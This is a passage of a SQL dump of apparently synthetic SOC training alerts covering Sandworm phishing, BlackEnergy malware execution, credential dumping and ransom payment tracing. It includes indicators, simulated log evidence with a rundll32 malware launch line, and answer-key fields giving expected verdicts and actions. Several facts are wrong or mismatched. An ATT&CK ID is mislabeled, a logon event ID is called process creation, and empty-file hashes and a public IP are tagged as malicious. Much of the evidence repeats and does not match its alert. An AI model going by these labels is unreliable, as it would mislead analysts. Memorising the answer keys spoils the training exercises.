Directory\",\"verdict\":\"suspicious\",\"details\":\"Account compromised in recent phishing campaign.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b2a5d6f7c3e9d1b7f4a8e3b9c1d7e7f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_financials.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"File contains sensitive financial data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(778, 'Bitcoin Ransom Payment and Fund Tracing - Step 5', 'high', 'Blockchain analysis platforms', 'During the tracing of the $11 million ransom payment, authorities identified a transaction chain where the attackers attempted to obfuscate funds through a series of complex transactions. This step involved multiple Bitcoin addresses and associated transactions, analyzing the flow and linking it to known malicious actor wallets.', 'Financial Transaction Analysis', 'T1483: Data Encrypted for Impact', 1, 'new', NULL, '{\"transaction_id\":\"9b8f82d6755a4cb7b1f2a670c1f9a2f3\",\"source_address\":\"3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5\",\"destination_addresses\":[\"bc1qtz3z0x0l47q8x9kq0n5e6r3j4t8f7n9u3f5h0r\",\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\"],\"amount\":\"0.5 BTC\",\"timestamp\":\"2023-10-12T14:48:00Z\",\"related_ips\":[\"45.76.123.88\",\"10.0.0.23\"],\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"related_domains\":[\"maliciouswallet.com\"],\"usernames\":[\"attacker_user\"]}', '2026-01-11 23:35:35', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.123.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with ransomware operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP used for monitoring transactions\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware payload\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"maliciouswallet.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Analysis Tool\",\"verdict\":\"malicious\",\"details\":\"Domain associated with cryptocurrency laundering\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Behavior Analytics\",\"verdict\":\"suspicious\",\"details\":\"Username linked to unauthorized transactions\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.425Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"9b8f82d6755a4cb7b1f2a670c1f9a2f3\\\",\\\"source_address\\\":\\\"3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5\\\",\\\"destination_addresses\\\":[\\\"bc1qtz3z0x0l47q8x9kq0n5e6r3j4t8f7n9u3f5h0r\\\",\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\"],\\\"amount\\\":\\\"0.5 BTC\\\",\\\"timestamp\\\":\\\"2023-10-12T14:48:00Z\\\",\\\"related_ips\\\":[\\\"45.76.123.88\\\",\\\"10.0.0.23\\\"],\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"related_domains\\\":[\\\"maliciouswallet.com\\\"],\\\"usernames\\\":[\\\"attacker_user\\\"]}\"},{\"timestamp\":\"2026-02-01T20:31:22.425Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"9b8f82d6755a4cb7b1f2a670c1f9a2f3\\\",\\\"source_address\\\":\\\"3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5\\\",\\\"destination_addresses\\\":[\\\"bc1qtz3z0x0l47q8x9kq0n5e6r3j4t8f7n9u3f5h0r\\\",\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\"],\\\"amount\\\":\\\"0.5 BTC\\\",\\\"timestamp\\\":\\\"2023-10-12T14:48:00Z\\\",\\\"related_ips\\\":[\\\"45.76.123.88\\\",\\\"10.0.0.23\\\"],\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"related_domains\\\":[\\\"maliciouswallet.com\\\"],\\\"usernames\\\":[\\\"attacker_user\\\"]}\"},{\"timestamp\":\"2026-02-01T20:30:22.425Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"9b8f82d6755a4cb7b1f2a670c1f9a2f3\\\",\\\"source_address\\\":\\\"3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5\\\",\\\"destination_addresses\\\":[\\\"bc1qtz3z0x0l47q8x9kq0n5e6r3j4t8f7n9u3f5h0r\\\",\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\"],\\\"amount\\\":\\\"0.5 BTC\\\",\\\"timestamp\\\":\\\"2023-10-12T14:48:00Z\\\",\\\"related_ips\\\":[\\\"45.76.123.88\\\",\\\"10.0.0.23\\\"],\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"related_domains\\\":[\\\"maliciouswallet.com\\\"],\\\"usernames\\\":[\\\"attacker_user\\\"]}\"},{\"timestamp\":\"2026-02-01T20:29:22.425Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"9b8f82d6755a4cb7b1f2a670c1f9a2f3\\\",\\\"source_address\\\":\\\"3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5\\\",\\\"destination_addresses\\\":[\\\"bc1qtz3z0x0l47q8x9kq0n5e6r3j4t8f7n9u3f5h0r\\\",\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\"],\\\"amount\\\":\\\"0.5 BTC\\\",\\\"timestamp\\\":\\\"2023-10-12T14:48:00Z\\\",\\\"related_ips\\\":[\\\"45.76.123.88\\\",\\\"10.0.0.23\\\"],\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"related_domains\\\":[\\\"maliciouswallet.com\\\"],\\\"usernames\\\":[\\\"attacker_user\\\"]}\"},{\"timestamp\":\"2026-02-01T20:28:22.425Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"9b8f82d6755a4cb7b1f2a670c1f9a2f3\\\",\\\"source_address\\\":\\\"3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5\\\",\\\"destination_addresses\\\":[\\\"bc1qtz3z0x0l47q8x9kq0n5e6r3j4t8f7n9u3f5h0r\\\",\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\"],\\\"amount\\\":\\\"0.5 BTC\\\",\\\"timestamp\\\":\\\"2023-10-12T14:48:00Z\\\",\\\"related_ips\\\":[\\\"45.76.123.88\\\",\\\"10.0.0.23\\\"],\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"related_domains\\\":[\\\"maliciouswallet.com\\\"],\\\"usernames\\\":[\\\"attacker_user\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(779, 'Initial Access via Phishing Emails', 'high', 'Email logs and employee reports', 'Sandworm initiated their attack with a spear-phishing campaign targeting Ukrainian power company employees. The emails contained malicious attachments that served as the attack\'s entry point.', 'Phishing Attack', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T08:45:00Z\",\"source_ip\":\"185.92.220.54\",\"destination_ip\":\"10.0.0.25\",\"subject\":\"Urgent: Update Required\",\"sender_email\":\"it-support@fakedomain.ua\",\"recipient_email\":\"employee@ukrpower.ua\",\"attachment_name\":\"Update_Instruction.docx\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"email_client\":\"Outlook\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"status\":\"Delivered\"}', '2026-01-11 23:37:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known Sandworm IP used in previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"it-support@fakedomain.ua\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Spoofed email used in targeted phishing.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Update_Instruction.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Contains macros that attempt to download additional payloads.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Sandworm phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Emails\",\"date\":\"2026-02-01T20:32:22.426Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(780, 'Execution of BlackEnergy Malware', 'critical', 'Endpoint security logs', 'Upon gaining initial access, Sandworm deployed the BlackEnergy malware to the compromised systems, enabling further malicious activities within the network.', 'Malware Deployment', 'T1203 - Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:52:30Z\",\"event_id\":\"4624\",\"event_type\":\"Process Creation\",\"host\":\"compromised-host\",\"source_ip\":\"93.184.216.34\",\"destination_ip\":\"10.0.5.23\",\"user\":\"SYSTEM\",\"process_name\":\"C:\\\\Windows\\\\system32\\\\rundll32.exe\",\"command_line\":\"rundll32.exe C:\\\\Users\\\\Public\\\\blackenergy.dll,Start\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"blackenergy.dll\",\"user_id\":\"S-1-5-18\"}', '2026-01-11 23:37:37', '2026-02-16 18:00:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"93.184.216.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known Sandworm-associated IP used in past malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Registry\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with BlackEnergy malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"blackenergy.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Research Database\",\"verdict\":\"malicious\",\"details\":\"Filename used by BlackEnergy malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.427Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:52:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Creation\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"source_ip\\\":\\\"93.184.216.34\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\rundll32.exe\\\",\\\"command_line\\\":\\\"rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\blackenergy.dll,Start\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"blackenergy.dll\\\",\\\"user_id\\\":\\\"S-1-5-18\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.427Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:52:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Creation\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"source_ip\\\":\\\"93.184.216.34\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\rundll32.exe\\\",\\\"command_line\\\":\\\"rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\blackenergy.dll,Start\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"blackenergy.dll\\\",\\\"user_id\\\":\\\"S-1-5-18\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.427Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:52:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Creation\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"source_ip\\\":\\\"93.184.216.34\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\rundll32.exe\\\",\\\"command_line\\\":\\\"rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\blackenergy.dll,Start\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"blackenergy.dll\\\",\\\"user_id\\\":\\\"S-1-5-18\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.427Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:52:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Creation\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"source_ip\\\":\\\"93.184.216.34\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\rundll32.exe\\\",\\\"command_line\\\":\\\"rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\blackenergy.dll,Start\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"blackenergy.dll\\\",\\\"user_id\\\":\\\"S-1-5-18\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.427Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:52:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Creation\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"source_ip\\\":\\\"93.184.216.34\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\rundll32.exe\\\",\\\"command_line\\\":\\\"rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\blackenergy.dll,Start\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"blackenergy.dll\\\",\\\"user_id\\\":\\\"S-1-5-18\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(781, 'Persistence through Credential Dumping', 'critical', 'Memory forensics and user account monitoring', 'To ensure continued access, Sandworm used BlackEnergy to dump credentials from infected machines, allowing them to escalate privileges and deepen their control.', 'Credential Access', 'T1003.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T13:45:23Z\",\"event_id\":\"4624\",\"system\":{\"hostname\":\"compromised-host\",\"internal_ip\":\"192.168.1.45\",\"os\":\"Windows Server 2016\"},\"user\":{\"username\":\"admin_user\",\"domain\":\"CORPDOMAIN\"},\"process\":{\"name\":\"lsass.exe\",\"pid\":1040,\"command_line\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},\"malware\":{\"name\":\"BlackEnergy\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"network\":{\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"185.92.220.25\",\"protocol\":\"TCP\",\"port\":445},\"files\":[{\"filename\":\"dumped_creds.dmp\",\"path\":\"C:\\\\Windows\\\\Temp\\\\dumped_creds.dmp\"}]}', '2026-01-11 23:37:37', '2026-02-16 18:01:00', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.92.220.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"BlackEnergy malware hash\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"dumped_creds.dmp\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"suspicious\",\"details\":\"Credential dump file\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.429Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"hostname\\\":\\\"compromised-host\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"os\\\":\\\"Windows Server 2016\\\"},\\\"user\\\":{\\\"username\\\":\\\"admin_user\\\",\\\"domain\\\":\\\"CORPDOMAIN\\\"},\\\"process\\\":{\\\"name\\\":\\\"lsass.exe\\\",\\\"pid\\\":1040,\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\lsass.exe\\\"},\\\"malware\\\":{\\\"name\\\":\\\"BlackEnergy\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.92.220.25\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":445},\\\"files\\\":[{\\\"filename\\\":\\\"dumped_creds.dmp\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumped_creds.dmp\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:31:22.429Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"hostname\\\":\\\"compromised-host\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"os\\\":\\\"Windows Server 2016\\\"},\\\"user\\\":{\\\"username\\\":\\\"admin_user\\\",\\\"domain\\\":\\\"CORPDOMAIN\\\"},\\\"process\\\":{\\\"name\\\":\\\"lsass.exe\\\",\\\"pid\\\":1040,\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\lsass.exe\\\"},\\\"malware\\\":{\\\"name\\\":\\\"BlackEnergy\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.92.220.25\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":445},\\\"files\\\":[{\\\"filename\\\":\\\"dumped_creds.dmp\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumped_creds.dmp\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:30:22.429Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"hostname\\\":\\\"compromised-host\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"os\\\":\\\"Windows Server 2016\\\"},\\\"user\\\":{\\\"username\\\":\\\"admin_user\\\",\\\"domain\\\":\\\"CORPDOMAIN\\\"},\\\"process\\\":{\\\"name\\\":\\\"lsass.exe\\\",\\\"pid\\\":1040,\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\lsass.exe\\\"},\\\"malware\\\":{\\\"name\\\":\\\"BlackEnergy\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.92.220.25\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":445},\\\"files\\\":[{\\\"filename\\\":\\\"dumped_creds.dmp\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumped_creds.dmp\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:29:22.429Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"hostname\\\":\\\"compromised-host\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"os\\\":\\\"Windows Server 2016\\\"},\\\"user\\\":{\\\"username\\\":\\\"admin_user\\\",\\\"domain\\\":\\\"CORPDOMAIN\\\"},\\\"process\\\":{\\\"name\\\":\\\"lsass.exe\\\",\\\"pid\\\":1040,\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\lsass.exe\\\"},\\\"malware\\\":{\\\"name\\\":\\\"BlackEnergy\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.92.220.25\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":445},\\\"files\\\":[{\\\"filename\\\":\\\"dumped_creds.dmp\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumped_creds.dmp\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:28:22.429Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"hostname\\\":\\\"compromised-host\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"os\\\":\\\"Windows Server 